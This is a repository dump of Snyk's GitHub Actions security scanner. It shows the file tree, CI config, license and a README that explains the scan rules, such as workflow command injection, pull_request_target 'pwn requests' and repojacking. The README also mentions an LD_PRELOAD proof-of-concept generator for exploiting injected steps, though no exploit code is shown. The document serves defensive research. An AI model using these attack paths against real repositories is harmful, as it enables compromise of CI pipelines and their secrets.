├── .circleci └── config.yml ├── .eslintrc.yml ├── .github └── CODEOWNERS ├── .gitignore ├── .gitmodules ├── .pre-commit-config.yaml ├── CODE_OF_CONDUCT.md ├── CONTRIBUTING.md ├── LICENSE ├── NOTICE ├── README.md ├── SECURITY.md ├── catalog-info.yaml ├── index.mjs ├── lib ├── actions.mjs ├── clone.mjs ├── outputHandler.mjs ├── rules │ ├── cmd_exec.mjs │ ├── code_injection.mjs │ ├── common │ │ ├── defs.mjs │ │ ├── finding.mjs │ │ └── utils.mjs │ ├── pwn_request.mjs │ ├── repojackable.mjs │ ├── test_rule.mjs │ ├── unpinned_action.mjs │ ├── unsafe_input_assign.mjs │ └── workflow_run.mjs ├── scanner.mjs ├── test │ ├── actions.test.js │ ├── clone.test.js │ ├── rules_common_utils.test.js │ └── utils.test.js └── utils.mjs ├── package-lock.json └── package.json /.circleci/config.yml: -------------------------------------------------------------------------------- 1 | version: 2.1 2 | 3 | orbs: 4 | snyk: snyk/snyk@2.1.0 5 | 6 | defaults: &defaults 7 | resource_class: small 8 | docker: 9 | - image: cimg/node:22.2.0 10 | 11 | jobs: 12 | security_scans: 13 | <<: *defaults 14 | steps: 15 | - checkout 16 | - snyk/scan: 17 | fail-on-issues: false 18 | monitor-on-build: true 19 | - snyk/scan: 20 | command: code test --report --project-name=snyk-labs/github-actions-scanner 21 | fail-on-issues: false 22 | monitor-on-build: false 23 | 24 | npm_test: 25 | <<: *defaults 26 | steps: 27 | - checkout 28 | 29 | - restore_cache: 30 | keys: 31 | - v1-dependencies-{{ checksum "package.json" }} 32 | # fallback to using the latest cache if no exact match is found 33 | - v1-dependencies- 34 | 35 | - run: 36 | name: Install Dependencies 37 | command: npm install 38 | 39 | - save_cache: 40 | paths: 41 | - node_modules 42 | key: v1-dependencies-{{ checksum "package.json" }} 43 | 44 | - run: 45 | name: Run Tests 46 | command: npm test 47 | 48 | workflows: 49 | version: 2 50 | CICD: 51 | jobs: 52 | - security_scans: 53 | name: Security Scans 54 | context: 55 | - security-labs-snyk 56 | - npm_test: 57 
| name: Run npm test 58 | -------------------------------------------------------------------------------- /.eslintrc.yml: -------------------------------------------------------------------------------- 1 | env: 2 | browser: true 3 | es2021: true 4 | extends: airbnb-base 5 | parserOptions: 6 | ecmaVersion: latest 7 | sourceType: module 8 | rules: {} 9 | -------------------------------------------------------------------------------- /.github/CODEOWNERS: -------------------------------------------------------------------------------- 1 | * @snyk/security-labs 2 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Logs 2 | logs 3 | *.log 4 | npm-debug.log* 5 | yarn-debug.log* 6 | yarn-error.log* 7 | lerna-debug.log* 8 | .pnpm-debug.log* 9 | 10 | # Diagnostic reports (https://nodejs.org/api/report.html) 11 | report.[0-9]*.[0-9]*.[0-9]*.[0-9]*.json 12 | 13 | # Runtime data 14 | pids 15 | *.pid 16 | *.seed 17 | *.pid.lock 18 | 19 | # Directory for instrumented libs generated by jscoverage/JSCover 20 | lib-cov 21 | 22 | # Coverage directory used by tools like istanbul 23 | coverage 24 | *.lcov 25 | 26 | # nyc test coverage 27 | .nyc_output 28 | 29 | # Grunt intermediate storage (https://gruntjs.com/creating-plugins#storing-task-files) 30 | .grunt 31 | 32 | # Bower dependency directory (https://bower.io/) 33 | bower_components 34 | 35 | # node-waf configuration 36 | .lock-wscript 37 | 38 | # Compiled binary addons (https://nodejs.org/api/addons.html) 39 | build/Release 40 | 41 | # Dependency directories 42 | node_modules/ 43 | jspm_packages/ 44 | 45 | # Snowpack dependency directory (https://snowpack.dev/) 46 | web_modules/ 47 | 48 | # TypeScript cache 49 | *.tsbuildinfo 50 | 51 | # Optional npm cache directory 52 | .npm 53 | 54 | # Optional eslint cache 55 | .eslintcache 56 | 57 | # Optional stylelint cache 58 | .stylelintcache 59 | 60 | # 
Microbundle cache 61 | .rpt2_cache/ 62 | .rts2_cache_cjs/ 63 | .rts2_cache_es/ 64 | .rts2_cache_umd/ 65 | 66 | # Optional REPL history 67 | .node_repl_history 68 | 69 | # Output of 'npm pack' 70 | *.tgz 71 | 72 | # Yarn Integrity file 73 | .yarn-integrity 74 | 75 | # dotenv environment variable files 76 | .env 77 | .env.development.local 78 | .env.test.local 79 | .env.production.local 80 | .env.local 81 | 82 | # parcel-bundler cache (https://parceljs.org/) 83 | .cache 84 | .parcel-cache 85 | 86 | # Next.js build output 87 | .next 88 | out 89 | 90 | # Nuxt.js build / generate output 91 | .nuxt 92 | dist 93 | 94 | # Gatsby files 95 | .cache/ 96 | # Comment in the public line in if your project uses Gatsby and not Next.js 97 | # https://nextjs.org/blog/next-9-1#public-directory-support 98 | # public 99 | 100 | # vuepress build output 101 | .vuepress/dist 102 | 103 | # vuepress v2.x temp and cache directory 104 | .temp 105 | .cache 106 | 107 | # Docusaurus cache and generated files 108 | .docusaurus 109 | 110 | # Serverless directories 111 | .serverless/ 112 | 113 | # FuseBox cache 114 | .fusebox/ 115 | 116 | # DynamoDB Local files 117 | .dynamodb/ 118 | 119 | # TernJS port file 120 | .tern-port 121 | 122 | # Stores VSCode versions used for testing VSCode extensions 123 | .vscode-test 124 | 125 | # yarn v2 126 | .yarn/cache 127 | .yarn/unplugged 128 | .yarn/build-state.yml 129 | .yarn/install-state.gz 130 | .pnp.* 131 | 132 | output/ 133 | tmp/ 134 | 135 | .dccache 136 | 137 | cookie.json 138 | sa-key.json -------------------------------------------------------------------------------- /.gitmodules: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/snyk-labs/github-actions-scanner/435a6c75bcfaea5edb5bb97690e01e1a94de850c/.gitmodules -------------------------------------------------------------------------------- /.pre-commit-config.yaml: 
-------------------------------------------------------------------------------- 1 | repos: 2 | - repo: https://github.com/gitleaks/gitleaks 3 | rev: v8.16.1 4 | hooks: 5 | - id: gitleaks 6 | -------------------------------------------------------------------------------- /CODE_OF_CONDUCT.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | We as members, contributors, and leaders pledge to make participation in our 6 | community a harassment-free experience for everyone, regardless of age, body 7 | size, visible or invisible disability, ethnicity, sex characteristics, gender 8 | identity and expression, level of experience, education, socio-economic status, 9 | nationality, personal appearance, race, religion, or sexual identity 10 | and orientation. 11 | 12 | We pledge to act and interact in ways that contribute to an open, welcoming, 13 | diverse, inclusive, and healthy community. 
14 | 15 | ## Our Standards 16 | 17 | Examples of behavior that contributes to a positive environment for our 18 | community include: 19 | 20 | * Demonstrating empathy and kindness toward other people 21 | * Being respectful of differing opinions, viewpoints, and experiences 22 | * Giving and gracefully accepting constructive feedback 23 | * Accepting responsibility and apologizing to those affected by our mistakes, 24 | and learning from the experience 25 | * Focusing on what is best not just for us as individuals, but for the 26 | overall community 27 | 28 | Examples of unacceptable behavior include: 29 | 30 | * The use of sexualized language or imagery, and sexual attention or 31 | advances of any kind 32 | * Trolling, insulting or derogatory comments, and personal or political attacks 33 | * Public or private harassment 34 | * Publishing others' private information, such as a physical or email 35 | address, without their explicit permission 36 | * Other conduct which could reasonably be considered inappropriate in a 37 | professional setting 38 | 39 | ## Enforcement Responsibilities 40 | 41 | Community leaders are responsible for clarifying and enforcing our standards of 42 | acceptable behavior and will take appropriate and fair corrective action in 43 | response to any behavior that they deem inappropriate, threatening, offensive, 44 | or harmful. 45 | 46 | Community leaders have the right and responsibility to remove, edit, or reject 47 | comments, commits, code, wiki edits, issues, and other contributions that are 48 | not aligned to this Code of Conduct, and will communicate reasons for moderation 49 | decisions when appropriate. 50 | 51 | ## Scope 52 | 53 | This Code of Conduct applies within all community spaces, and also applies when 54 | an individual is officially representing the community in public spaces. 
55 | Examples of representing our community include using an official e-mail address, 56 | posting via an official social media account, or acting as an appointed 57 | representative at an online or offline event. 58 | 59 | ## Enforcement 60 | 61 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 62 | reported to the community leaders responsible for enforcement at 63 | `oss-conduct-reports@snyk.io`. 64 | All complaints will be reviewed and investigated promptly and fairly. 65 | 66 | All community leaders are obligated to respect the privacy and security of the 67 | reporter of any incident. 68 | 69 | ## Enforcement Guidelines 70 | 71 | Community leaders will follow these Community Impact Guidelines in determining 72 | the consequences for any action they deem in violation of this Code of Conduct: 73 | 74 | ### 1. Correction 75 | 76 | **Community Impact**: Use of inappropriate language or other behavior deemed 77 | unprofessional or unwelcome in the community. 78 | 79 | **Consequence**: A private, written warning from community leaders, providing 80 | clarity around the nature of the violation and an explanation of why the 81 | behavior was inappropriate. A public apology may be requested. 82 | 83 | ### 2. Warning 84 | 85 | **Community Impact**: A violation through a single incident or series 86 | of actions. 87 | 88 | **Consequence**: A warning with consequences for continued behavior. No 89 | interaction with the people involved, including unsolicited interaction with 90 | those enforcing the Code of Conduct, for a specified period of time. This 91 | includes avoiding interactions in community spaces as well as external channels 92 | like social media. Violating these terms may lead to a temporary or 93 | permanent ban. 94 | 95 | ### 3. Temporary Ban 96 | 97 | **Community Impact**: A serious violation of community standards, including 98 | sustained inappropriate behavior. 
99 | 100 | **Consequence**: A temporary ban from any sort of interaction or public 101 | communication with the community for a specified period of time. No public or 102 | private interaction with the people involved, including unsolicited interaction 103 | with those enforcing the Code of Conduct, is allowed during this period. 104 | Violating these terms may lead to a permanent ban. 105 | 106 | ### 4. Permanent Ban 107 | 108 | **Community Impact**: Demonstrating a pattern of violation of community 109 | standards, including sustained inappropriate behavior, harassment of an 110 | individual, or aggression toward or disparagement of classes of individuals. 111 | 112 | **Consequence**: A permanent ban from any sort of public interaction within 113 | the community. 114 | 115 | ## Attribution 116 | 117 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], 118 | version 2.0, available at 119 | https://www.contributor-covenant.org/version/2/0/code_of_conduct.html. 120 | 121 | Community Impact Guidelines were inspired by [Mozilla's code of conduct 122 | enforcement ladder](https://github.com/mozilla/diversity). 123 | 124 | [homepage]: https://www.contributor-covenant.org 125 | 126 | For answers to common questions about this code of conduct, see the FAQ at 127 | https://www.contributor-covenant.org/faq. Translations are available at 128 | https://www.contributor-covenant.org/translations. 129 | -------------------------------------------------------------------------------- /CONTRIBUTING.md: -------------------------------------------------------------------------------- 1 | # CONTRIBUTING.md 2 | 3 | First and foremost, thank you for considering contributing to this project! Your contribution is valuable and we genuinely appreciate your interest. 4 | 5 | This is a distinct software project developed by Snyk. Although separate from our core product line, it provides a platform for us to demonstrate our capabilities and some key concepts. 
6 | 7 | Please note that we monitor and respond to issues and pull requests on a best-effort basis. 8 | 9 | ### How to contribute 10 | 11 | #### Code of Conduct 12 | 13 | Prior to contributing, please familiarize yourself with our [Code of Conduct](CODE_OF_CONDUCT.md). We expect all our contributors to uphold these guidelines to maintain a respectful and inclusive environment. 14 | 15 | #### Open Development 16 | 17 | All development work is done directly on GitHub. Both our core team members and external contributors send pull requests, which go through a unified review process. 18 | 19 | #### Reporting Issues 20 | 21 | We welcome you to raise an issue if you discover a bug, find a documentation error, or identify a feature you believe should be added. You can do this by opening a new issue in the issue tracker. Please ensure that your issue hasn't already been reported by reviewing existing issues before creating a new one. We value the time and effort you spend in providing these details. 22 | 23 | #### Pull Requests 24 | 25 | We highly recommend that contributors raise an issue before making a pull request. This allows us to discuss potential changes and prevent unnecessary or duplicative work. Once the issue has been reviewed and we've agreed on a solution, contributors can then fork the repository and submit a pull request. 26 | 27 | ##### Submitting your Pull Request 28 | 29 | - Ensure your code passes all tests, and consider adding new tests for the changes you've made. 30 | - In your Pull Request description, provide a detailed explanation of your changes. This assists us in understanding your decision-making process and aids in the effective review of your work. 31 | - Remember to reference the relevant issue number in your pull request. 32 | 33 | Your time and efforts make this project better, and we're grateful for your support and contributions. Thank you! 
34 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 
39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. 
Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. 
You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 
122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. 
In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. 
We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright 2024 Snyk Ltd. 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | -------------------------------------------------------------------------------- /NOTICE: -------------------------------------------------------------------------------- 1 | © 2024 Snyk Limited All rights reserved. 2 | 3 | Licensed under the Apache License, Version 2.0 (the "License"); 4 | you may not use this file except in compliance with the License. 5 | You may obtain a copy of the License at 6 | 7 | http://www.apache.org/licenses/LICENSE-2.0 8 | 9 | Unless required by applicable law or agreed to in writing, software 10 | distributed under the License is distributed on an "AS IS" BASIS, 11 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 12 | See the License for the specific language governing permissions and 13 | limitations under the License. 14 | 15 | ### Third party software ### 16 | We use third-party libraries, whose license information is included 17 | in the repository folder 'licenses'. 
18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | ### ❗ **IMPORTANT NOTICE** ❗ ### 2 | 3 | This tool was released as part of a research project on Github Actions by the Security Labs team and isn't supported by Snyk products. 4 | For more details, please follow the Area41 [talk](https://www.youtube.com/watch?v=pUa5P7THc3c&index=4) and Snyk [blog](https://snyk.io/blog/exploring-vulnerabilities-github-actions/). 5 | 6 | # Github Actions Scanner 7 | 8 | Scans your Github Actions for security issues. 9 | 10 | ## Usage 11 | 12 | Run: `npm run start -- [OPTIONS]`. 13 | 14 | ``` 15 | Github Actions Scanner 16 | 17 | Options: 18 | -e, --env .env file path. (default: ".env") 19 | -r, --recurse Recurse into referenced actions 20 | -m, --max-depth Max Recursion Depth (default: 5) 21 | -s, --scan-rules Comma separated list of rules to use, by ID (default: "") 22 | --output Output file path. 23 | -f, --format Output format (choices: "json", "text", default: "text") 24 | -h, --help display help for command 25 | 26 | Commands: 27 | list-rules List all available rules 28 | scan-repo [options] Scan a single repo 29 | scan-org [options] Scan all repos in an org 30 | scan-actions [options] Scan a list of standalone actions from a file 31 | clone [options] Pseudo-fork a repo for testing 32 | ldpreload-poc [options] Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD 33 | help [command] display help for command 34 | ``` 35 | 36 | ### `list-rules` 37 | 38 | ``` 39 | List all available rules 40 | 41 | Options: 42 | -h, --help display help for command 43 | ``` 44 | 45 | ### `scan-repo` 46 | 47 | ``` 48 | Scan a single repo 49 | 50 | Options: 51 | -u, --url Github repository URL. 
52 | -h, --help display help for command 53 | ``` 54 | 55 | ### `scan-org` 56 | 57 | ``` 58 | Scan all repos in an org 59 | 60 | Options: 61 | -o, --org Github org name. 62 | -h, --help display help for command 63 | ``` 64 | 65 | ### `scan-actions` 66 | 67 | ``` 68 | Scan a list of standalone actions from a file 69 | 70 | Options: 71 | -a, --actions-yaml [actions-yaml-path] Analyze actions from yaml. (default: "./github-action-repos.yml") 72 | -h, --help display help for command 73 | ``` 74 | 75 | 76 | ### `clone` 77 | 78 | ``` 79 | Pseudo-fork a repo for testing 80 | 81 | Options: 82 | -u, --url Github repository URL. 83 | -h, --help display help for command 84 | ``` 85 | 86 | ### `ldpreload-poc` 87 | 88 | ``` 89 | Create a PoC to exploit subsequent steps after command injection with LD_PRELOAD 90 | 91 | Options: 92 | -c, --command Command to run from the LD_PRELOAD 93 | -b, --base64 Encode the code for injection 94 | -h, --help display help for command 95 | ``` 96 | 97 | Please provide a `GITHUB_TOKEN` either via `.env` file or env var. 98 | 99 | ## Rules 100 | ### `CMD_EXEC` 101 | **Description:** Dynamic values inserted into a [`run`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun) (or similar) item using `${{ }}` are not escaped and, if controlled by an attacker, may result in command execution inside the step. 102 | 103 | **Mitigation:** 104 | 105 | - Pass the expressions to an action as an argument in the [`with`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepswith) clause 106 | - Pass the expressions to a [`run`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsrun) directive using an intermediate [environmental variable](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsenv). 
For more details, please check [Good practices for mitigating script injection attacks](https://docs.github.com/en/actions/security-guides/security-hardening-for-github-actions#good-practices-for-mitigating-script-injection-attacks). 107 | 108 | ### `CODE_INJECT` 109 | **Description:** Similar to `CMD_EXEC`, when using the `actions/github-script` action, values inserted using `${{ }}` are not escaped and, if controlled by an attacker, may result in command execution inside the step. 110 | 111 | **Mitigation:** Pass the expressions to the action as an argument in the [`with`](https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idstepswith) clause. 112 | 113 | ### `PWN_REQUEST` 114 | **Description:** An action triggered by `pull_request_target` which additionally performs a checkout of the pull request branch may lead to compromise of specific steps or secrets. `pull_request_target` can be triggered by untrusted external attackers. 115 | 116 | **Mitigation:** If accepting actions triggered by unknown third parties, ensure that the pull request branch is not checked out and acted on unsafely (e.g. via the use of tooling which acts on the repository, such as `npm install`). If it is necessary to check out the third party code, be very careful to ensure that no steps treat the repository as trusted. 117 | 118 | ### `UNSAFE_INPUT_ASSIGN` 119 | **Description:** Potentially attacker controlled input is passed by value to a step using `with`. Depending on the contents of the step involved, if these values are not handled with care this may result in further compromise (such as command or code execution in the step). 120 | 121 | **Mitigation:** Ensure that all values which may be attacker controlled are handled with care to ensure that they do not result in further compromise. 
122 | 123 | ### `WORKFLOW_RUN` 124 | **Description:** The identified action is triggered by another action, and performs a checkout of the branch which triggered the original action. This branch may be attacker controlled and therefore this action chain should be reviewed. 125 | 126 | **Mitigation:** Ensure that subsequently triggered actions treat untrusted data sources as untrusted, especially when the origin is masked by indirection of the original action. 127 | 128 | ### `REPOJACKABLE` 129 | **Description:** The identified referenced action may be repojackable. Either the organisation has been renamed or does not exist at all. 130 | 131 | **Mitigation:** Ensure that all `uses` items reference present and up-to-date repositories to ensure that they cannot be repojacked if renamed or deleted. 132 | 133 | ### `UNPINNED_ACTION` 134 | **Description:** The identified action is used (i.e via `uses:`) with a branch or tag reference, rather than a fixed commit. Should the target action repository be compromised this action may therefore be at risk. 135 | 136 | **Mitigation:** Ensure that all actions are referenced by a fixed and validated commit hash. 137 | 138 | ## Writing new rules 139 | 140 | To write your own rules, create a new `.mjs` file in the `rules` directory. This file should be written in Javascript and implement a single rule. Inside this file, implement and export a class which includes the following methods and attributes: 141 | 142 | ```javascript 143 | class MyRule { 144 | static id = "MY_RULE"; 145 | static documentation = "https://github.com/snyk/github-actions-scanner/blob/main/README.md#MY_RULE" 146 | 147 | static async description(finding) { 148 | // takes a single Finding instance, as defined in finding.mjs. 
Will always be from those returned by `scan` 149 | // allows for full context creation of a single line to provide a description for a single finding instance 150 | return ""; 151 | } 152 | 153 | static async prereport(finding) { 154 | // Optional 155 | // Perform final modification to a finding of this type once all scans have been completed 156 | // Useful for looking at other actions in the same repository 157 | } 158 | 159 | static async scan(action) { 160 | // Takes a single Action instance (defined in actions.mjs) and returns an array of Finding instances (defined in finding.mjs) 161 | return [ 162 | new Finding(MyRule, action, job_name, step_name_or_id, {"optional": "data"}) 163 | ] 164 | } 165 | } 166 | 167 | export { MyRule as default } 168 | ``` 169 | 170 | ### Matching Engine 171 | The `stepMatches` and `evaluateStepRule` functions are provided to assist with creating rules. 172 | 173 | `stepMatches` takes an array of individual 'rules' and an action step and returns an array of those rules which match. The rules are objects which can define either full match key:values, match based on regex on the value for a key, and keys not present. Examples to show this in action are as follows: 174 | 175 | The following example shows a match for the inclusion of any (denoted by the wildcard '*') secrets in the `env` object for the provided step. The resulting `matches` array will contain the single matching rule.
176 | 177 | ```javascript 178 | const RULES = [ 179 | { env: { "*": new RegExp("\\${{\\s*secrets[.]") } } 180 | ] 181 | 182 | const step = { 183 | name: 'Secrets test', 184 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 185 | env: { 186 | GITHUB_AUTH_TOKEN: '${{ secrets.GITHUB_TOKEN }}', 187 | GITLAB_AUTH_TOKEN: '${{ secrets.GITLAB_TOKEN }}' 188 | }, 189 | with: { 190 | command: 'omitted' 191 | } 192 | } 193 | 194 | const matches = stepMatches(RULES, step); 195 | ``` 196 | 197 | The following rule attempts to ensure that the `env.DOESNTMATCH` key is _not_ present. In this case the resulting `matches` array will be empty. 198 | 199 | ```javascript 200 | const RULES = [ 201 | { env: { "DOESNTMATCH": undefined } }, 202 | ] 203 | 204 | const step = { 205 | name: 'DOESNTMATCH test', 206 | uses: 'nick-invision/retry@943e742917ac94714d2f408a0e8320f2d1fcafcd', 207 | env: { 208 | DOESNTMATCH: "true" 209 | }, 210 | with: { 211 | command: 'omitted' 212 | } 213 | } 214 | 215 | const matches = stepMatches(RULES, step); 216 | ``` 217 | 218 | The additional function `evaluateStepRule` aids in the further processing of such a match. This function takes a single rule and a single step, and returns the step object only where the rule is specified. 219 | 220 | For example, the following rule will attempt to find environmental variables which match the `.INDME` regex. The resultant evaluation will only contain those elements that match the rule, in the same format as the rule itself. 
221 | 222 | ```javascript 223 | const RULE = { env: { "*": new RegExp(".INDME") } }; 224 | 225 | const step = { 226 | foo: "bar", 227 | env: { 228 | "abc": "FINDME", 229 | "def": "notme", 230 | "ghi": "FINDME" 231 | } 232 | } 233 | 234 | const evaluated = evaluateStepRule(RULE, step) 235 | 236 | expect(evaluated).toEqual({ 237 | "env": { 238 | "abc": "FINDME", 239 | "ghi": "FINDME", 240 | } 241 | }) 242 | ``` 243 | 244 | A third, optional, parameter can be passed to evaluateStepRule. This parameter is an object which is a subset of the rule object, and can be used to specify the regex match groups to extract in place of the full field. The example below shows extracting the suffix in place of the full environmental variable value. If no value is provided for a specific regex in the object, the full value will be returned. This is useful for displaying the specific line where an injection occurs, or extracting the interpolated variable inside a `${{ }}` item. 245 | 246 | ```javascript 247 | const RULE = { env: { "*": new RegExp("FINDME(?...)") } }; 248 | 249 | const step = { 250 | foo: "bar", 251 | env: { 252 | "abc": "FINDMEabc", 253 | "def": "notme", 254 | "ghi": "FINDMEdef" 255 | } 256 | } 257 | 258 | const evaluated = evaluateStepRule(RULE, step, { env: { "*": "suffix" } }) 259 | 260 | expect(evaluated).toEqual({ 261 | "env": { 262 | "abc": "abc", 263 | 